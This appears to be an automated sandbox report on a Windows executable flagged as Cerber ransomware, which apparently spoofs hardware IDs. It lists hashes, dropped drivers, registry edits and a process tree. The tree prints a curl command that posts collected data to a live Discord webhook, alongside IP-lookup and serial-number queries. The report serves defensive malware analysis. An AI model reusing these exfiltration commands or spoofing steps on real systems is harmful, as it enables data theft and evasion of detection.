cerber | d9994356922ae90e1715086a2d5f5cb110ff0bc432509bcd7528cb70fb1becec

Analysis

max time kernel
96s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-11-2024 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Neuer Ordner (2)/AV-Permanent-V2.1.exe
Size

5.8MB
MD5

2e39c7ee4f32bdb56637fa5e2979eacc
SHA1

7df4429c131043c66fea6ea8ba5b5caf8940d3b3
SHA256

4b4631d6e8dec4234941dfbb302ccb9f9ac83d9a015da5e1532347614c25b42e
SHA512

a6209e7c855a17594645a31cf4732e8a15ae1b4313fabbdc1f07fd5806e1cb007d3c8d88b5d08836502841403e4a86c0b248bac87208448c5026edcb9dc52ddc
SSDEEP

98304:trN/fXVWhV51qwU/ummzAB+l4JVite6XRGK2wtV6hyf0luLl:lNHABowAurABHiLGK2mV6hs0lg

Score

10^/10

cerber discovery ransomware vmprotect

Malware Config

Signatures

Cerber 64 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4336	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2640	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE

Cerber family
cerber

Executes dropped EXE 64 IoCs

pid	Process
1448	AMIDEWINx64.EXE
4652	AMIDEWINx64.EXE
4564	AMIDEWINx64.EXE
4572	AMIDEWINx64.EXE
2076	AMIDEWINx64.EXE
2840	AMIDEWINx64.EXE
2108	AMIDEWINx64.EXE
4952	AMIDEWINx64.EXE
796	AMIDEWINx64.EXE
3440	AMIDEWINx64.EXE
3064	AMIDEWINx64.EXE
2828	AMIDEWINx64.EXE
3024	AMIDEWINx64.EXE
3556	AMIDEWINx64.EXE
2324	AMIDEWINx64.EXE
2448	AMIDEWINx64.EXE
3564	AMIDEWINx64.EXE
1612	AMIDEWINx64.EXE
1888	AMIDEWINx64.EXE
816	AMIDEWINx64.EXE
3184	AMIDEWINx64.EXE
4988	AMIDEWINx64.EXE
4384	AMIDEWINx64.EXE
1472	AMIDEWINx64.EXE
1524	AMIDEWINx64.EXE
3640	AMIDEWINx64.EXE
2760	AMIDEWINx64.EXE
3320	AMIDEWINx64.EXE
5060	AMIDEWINx64.EXE
2004	AMIDEWINx64.EXE
1320	AMIDEWINx64.EXE
2460	AMIDEWINx64.EXE
4368	AMIDEWINx64.EXE
3452	AMIDEWINx64.EXE
1412	AMIDEWINx64.EXE
2388	AMIDEWINx64.EXE
3500	AMIDEWINx64.EXE
1976	AMIDEWINx64.EXE
2784	AMIDEWINx64.EXE
3272	AMIDEWINx64.EXE
3220	AMIDEWINx64.EXE
4012	AMIDEWINx64.EXE
1236	AMIDEWINx64.EXE
1092	AMIDEWINx64.EXE
3792	AMIDEWINx64.EXE
3564	AMIDEWINx64.EXE
3612	AMIDEWINx64.EXE
2268	AMIDEWINx64.EXE
4204	AMIDEWINx64.EXE
4320	AMIDEWINx64.EXE
5064	AMIDEWINx64.EXE
2540	AMIDEWINx64.EXE
2008	AMIDEWINx64.EXE
668	AMIDEWINx64.EXE
4524	AMIDEWINx64.EXE
3784	AMIDEWINx64.EXE
1044	AMIDEWINx64.EXE
3660	AMIDEWINx64.EXE
2488	AMIDEWINx64.EXE
4564	AMIDEWINx64.EXE
1012	AMIDEWINx64.EXE
1160	AMIDEWINx64.EXE
3924	AMIDEWINx64.EXE
1144	AMIDEWINx64.EXE

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/4848-6-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp	vmprotect
behavioral1/memory/4848-8-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp	vmprotect
behavioral1/memory/4848-6-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp	vmprotect
behavioral1/memory/4848-8-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
42	discord.com
41	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	ifconfig.me

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\windows11_check.txt	AV-Permanent-V2.1.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Solution64.sys	AV-Permanent-V2.1.exe
File opened for modification	C:\Windows\amifldrv64.sys	AV-Permanent-V2.1.exe
File created	C:\Windows\Mac.bat	AV-Permanent-V2.1.exe
File created	C:\Windows\AMIDEWINx64.EXE	AV-Permanent-V2.1.exe
File created	C:\Windows\amifldrv64.sys	AV-Permanent-V2.1.exe
File created	C:\Windows\Disk1.exe	AV-Permanent-V2.1.exe
File opened for modification	C:\Windows\Disk1.exe	AV-Permanent-V2.1.exe
File created	C:\Windows\Solution.exe	AV-Permanent-V2.1.exe
File created	C:\Windows\amigendrv64.sys	AV-Permanent-V2.1.exe
File opened for modification	C:\Windows\AMIDEWINx64.EXE	AV-Permanent-V2.1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4356	cmd.exe
4236	cmd.exe
4572	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "1927317963-691823515-2748222102"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "1927317963-691823515-2748222102"	reg.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2640	taskkill.exe
4336	taskkill.exe
756	taskkill.exe

Modifies registry key 1 TTPs 52 IoCs

Modify Registry

T1112

pid	Process
4272	reg.exe
4204	reg.exe
4212	reg.exe
2760	reg.exe
3560	reg.exe
4060	reg.exe
2312	reg.exe
1092	reg.exe
1876	reg.exe
1864	reg.exe
4324	reg.exe
3020	reg.exe
1044	reg.exe
2976	reg.exe
116	reg.exe
4732	reg.exe
396	reg.exe
2740	reg.exe
3356	reg.exe
2468	reg.exe
216	reg.exe
2016	reg.exe
2064	reg.exe
2996	reg.exe
4988	reg.exe
4572	reg.exe
5020	reg.exe
940	reg.exe
4908	reg.exe
2668	reg.exe
1348	reg.exe
536	reg.exe
4968	reg.exe
3800	reg.exe
1264	reg.exe
1320	reg.exe
784	reg.exe
2992	reg.exe
2540	reg.exe
4644	reg.exe
2060	reg.exe
412	reg.exe
3456	reg.exe
5072	reg.exe
1308	reg.exe
4756	reg.exe
224	reg.exe
2220	reg.exe
2828	reg.exe
4332	reg.exe
2448	reg.exe
2260	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe
4848	AV-Permanent-V2.1.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	whoami.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeSecurityPrivilege	4656	WMIC.exe
Token: SeTakeOwnershipPrivilege	4656	WMIC.exe
Token: SeLoadDriverPrivilege	4656	WMIC.exe
Token: SeSystemProfilePrivilege	4656	WMIC.exe
Token: SeSystemtimePrivilege	4656	WMIC.exe
Token: SeProfSingleProcessPrivilege	4656	WMIC.exe
Token: SeIncBasePriorityPrivilege	4656	WMIC.exe
Token: SeCreatePagefilePrivilege	4656	WMIC.exe
Token: SeBackupPrivilege	4656	WMIC.exe
Token: SeRestorePrivilege	4656	WMIC.exe
Token: SeShutdownPrivilege	4656	WMIC.exe
Token: SeDebugPrivilege	4656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4656	WMIC.exe
Token: SeRemoteShutdownPrivilege	4656	WMIC.exe
Token: SeUndockPrivilege	4656	WMIC.exe
Token: SeManageVolumePrivilege	4656	WMIC.exe
Token: 33	4656	WMIC.exe
Token: 34	4656	WMIC.exe
Token: 35	4656	WMIC.exe
Token: 36	4656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeSecurityPrivilege	4656	WMIC.exe
Token: SeTakeOwnershipPrivilege	4656	WMIC.exe
Token: SeLoadDriverPrivilege	4656	WMIC.exe
Token: SeSystemProfilePrivilege	4656	WMIC.exe
Token: SeSystemtimePrivilege	4656	WMIC.exe
Token: SeProfSingleProcessPrivilege	4656	WMIC.exe
Token: SeIncBasePriorityPrivilege	4656	WMIC.exe
Token: SeCreatePagefilePrivilege	4656	WMIC.exe
Token: SeBackupPrivilege	4656	WMIC.exe
Token: SeRestorePrivilege	4656	WMIC.exe
Token: SeShutdownPrivilege	4656	WMIC.exe
Token: SeDebugPrivilege	4656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4656	WMIC.exe
Token: SeRemoteShutdownPrivilege	4656	WMIC.exe
Token: SeUndockPrivilege	4656	WMIC.exe
Token: SeManageVolumePrivilege	4656	WMIC.exe
Token: 33	4656	WMIC.exe
Token: 34	4656	WMIC.exe
Token: 35	4656	WMIC.exe
Token: 36	4656	WMIC.exe
Token: SeDebugPrivilege	2640	taskkill.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	1976	whoami.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeSecurityPrivilege	4656	WMIC.exe
Token: SeTakeOwnershipPrivilege	4656	WMIC.exe
Token: SeLoadDriverPrivilege	4656	WMIC.exe
Token: SeSystemProfilePrivilege	4656	WMIC.exe
Token: SeSystemtimePrivilege	4656	WMIC.exe
Token: SeProfSingleProcessPrivilege	4656	WMIC.exe
Token: SeIncBasePriorityPrivilege	4656	WMIC.exe
Token: SeCreatePagefilePrivilege	4656	WMIC.exe
Token: SeBackupPrivilege	4656	WMIC.exe
Token: SeRestorePrivilege	4656	WMIC.exe
Token: SeShutdownPrivilege	4656	WMIC.exe
Token: SeDebugPrivilege	4656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4656	WMIC.exe
Token: SeRemoteShutdownPrivilege	4656	WMIC.exe
Token: SeUndockPrivilege	4656	WMIC.exe
Token: SeManageVolumePrivilege	4656	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4848 wrote to memory of 3868	4848	AV-Permanent-V2.1.exe	88
PID 4848 wrote to memory of 3868	4848	AV-Permanent-V2.1.exe	88
PID 4848 wrote to memory of 4324	4848	AV-Permanent-V2.1.exe	98
PID 4848 wrote to memory of 4324	4848	AV-Permanent-V2.1.exe	98
PID 4848 wrote to memory of 3428	4848	AV-Permanent-V2.1.exe	99
PID 4848 wrote to memory of 3428	4848	AV-Permanent-V2.1.exe	99
PID 4848 wrote to memory of 4304	4848	AV-Permanent-V2.1.exe	100
PID 4848 wrote to memory of 4304	4848	AV-Permanent-V2.1.exe	100
PID 4848 wrote to memory of 4576	4848	AV-Permanent-V2.1.exe	101
PID 4848 wrote to memory of 4576	4848	AV-Permanent-V2.1.exe	101
PID 4576 wrote to memory of 1976	4576	cmd.exe	102
PID 4576 wrote to memory of 1976	4576	cmd.exe	102
PID 4848 wrote to memory of 4276	4848	AV-Permanent-V2.1.exe	103
PID 4848 wrote to memory of 4276	4848	AV-Permanent-V2.1.exe	103
PID 4276 wrote to memory of 4500	4276	cmd.exe	104
PID 4276 wrote to memory of 4500	4276	cmd.exe	104
PID 4848 wrote to memory of 3424	4848	AV-Permanent-V2.1.exe	105
PID 4848 wrote to memory of 3424	4848	AV-Permanent-V2.1.exe	105
PID 3424 wrote to memory of 4656	3424	cmd.exe	106
PID 3424 wrote to memory of 4656	3424	cmd.exe	106
PID 4848 wrote to memory of 2880	4848	AV-Permanent-V2.1.exe	107
PID 4848 wrote to memory of 2880	4848	AV-Permanent-V2.1.exe	107
PID 2880 wrote to memory of 3536	2880	cmd.exe	108
PID 2880 wrote to memory of 3536	2880	cmd.exe	108
PID 4848 wrote to memory of 1236	4848	AV-Permanent-V2.1.exe	109
PID 4848 wrote to memory of 1236	4848	AV-Permanent-V2.1.exe	109
PID 4848 wrote to memory of 2612	4848	AV-Permanent-V2.1.exe	110
PID 4848 wrote to memory of 2612	4848	AV-Permanent-V2.1.exe	110
PID 4848 wrote to memory of 1132	4848	AV-Permanent-V2.1.exe	111
PID 4848 wrote to memory of 1132	4848	AV-Permanent-V2.1.exe	111
PID 4848 wrote to memory of 688	4848	AV-Permanent-V2.1.exe	112
PID 4848 wrote to memory of 688	4848	AV-Permanent-V2.1.exe	112
PID 4848 wrote to memory of 3880	4848	AV-Permanent-V2.1.exe	113
PID 4848 wrote to memory of 3880	4848	AV-Permanent-V2.1.exe	113
PID 4848 wrote to memory of 5020	4848	AV-Permanent-V2.1.exe	114
PID 4848 wrote to memory of 5020	4848	AV-Permanent-V2.1.exe	114
PID 5020 wrote to memory of 2640	5020	cmd.exe	115
PID 5020 wrote to memory of 2640	5020	cmd.exe	115
PID 4848 wrote to memory of 1836	4848	AV-Permanent-V2.1.exe	116
PID 4848 wrote to memory of 1836	4848	AV-Permanent-V2.1.exe	116
PID 1836 wrote to memory of 4336	1836	cmd.exe	117
PID 1836 wrote to memory of 4336	1836	cmd.exe	117
PID 4848 wrote to memory of 4356	4848	AV-Permanent-V2.1.exe	118
PID 4848 wrote to memory of 4356	4848	AV-Permanent-V2.1.exe	118
PID 4356 wrote to memory of 756	4356	cmd.exe	119
PID 4356 wrote to memory of 756	4356	cmd.exe	119
PID 4848 wrote to memory of 1860	4848	AV-Permanent-V2.1.exe	120
PID 4848 wrote to memory of 1860	4848	AV-Permanent-V2.1.exe	120
PID 4848 wrote to memory of 436	4848	AV-Permanent-V2.1.exe	121
PID 4848 wrote to memory of 436	4848	AV-Permanent-V2.1.exe	121
PID 4848 wrote to memory of 4836	4848	AV-Permanent-V2.1.exe	122
PID 4848 wrote to memory of 4836	4848	AV-Permanent-V2.1.exe	122
PID 4848 wrote to memory of 4008	4848	AV-Permanent-V2.1.exe	123
PID 4848 wrote to memory of 4008	4848	AV-Permanent-V2.1.exe	123
PID 4848 wrote to memory of 2764	4848	AV-Permanent-V2.1.exe	124
PID 4848 wrote to memory of 2764	4848	AV-Permanent-V2.1.exe	124
PID 4848 wrote to memory of 1452	4848	AV-Permanent-V2.1.exe	125
PID 4848 wrote to memory of 1452	4848	AV-Permanent-V2.1.exe	125
PID 4848 wrote to memory of 3088	4848	AV-Permanent-V2.1.exe	126
PID 4848 wrote to memory of 3088	4848	AV-Permanent-V2.1.exe	126
PID 4848 wrote to memory of 1932	4848	AV-Permanent-V2.1.exe	127
PID 4848 wrote to memory of 1932	4848	AV-Permanent-V2.1.exe	127
PID 1932 wrote to memory of 1392	1932	cmd.exe	128
PID 1932 wrote to memory of 1392	1932	cmd.exe	128

C:\Users\Admin\AppData\Local\Temp\Neuer Ordner (2)\AV-Permanent-V2.1.exe
"C:\Users\Admin\AppData\Local\Temp\Neuer Ordner (2)\AV-Permanent-V2.1.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c whoami
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Windows\system32\whoami.exe
    whoami
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -s ifconfig.me
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4276
- - C:\Windows\system32\curl.exe
    curl -s ifconfig.me
    3⤵
    PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X POST --data @embed_payload.json https://discord.com/api/webhooks/1291031909647908965/_o9_HuPH0rkzoTSDDtcpP6dJVZZjWwlG2Fs0t8VQZyGHxMk4dnWNgmd4ET6kbcpYskH_ > nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\curl.exe
    curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X POST --data @embed_payload.json https://discord.com/api/webhooks/1291031909647908965/_o9_HuPH0rkzoTSDDtcpP6dJVZZjWwlG2Fs0t8VQZyGHxMk4dnWNgmd4ET6kbcpYskH_
    3⤵
    PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 6
  2⤵
  PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c TASKKILL /F /IM FortniteLauncher.exe 2>NULL
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\system32\taskkill.exe
    TASKKILL /F /IM FortniteLauncher.exe
    3⤵
    - Cerber
    - Kills process with taskkill
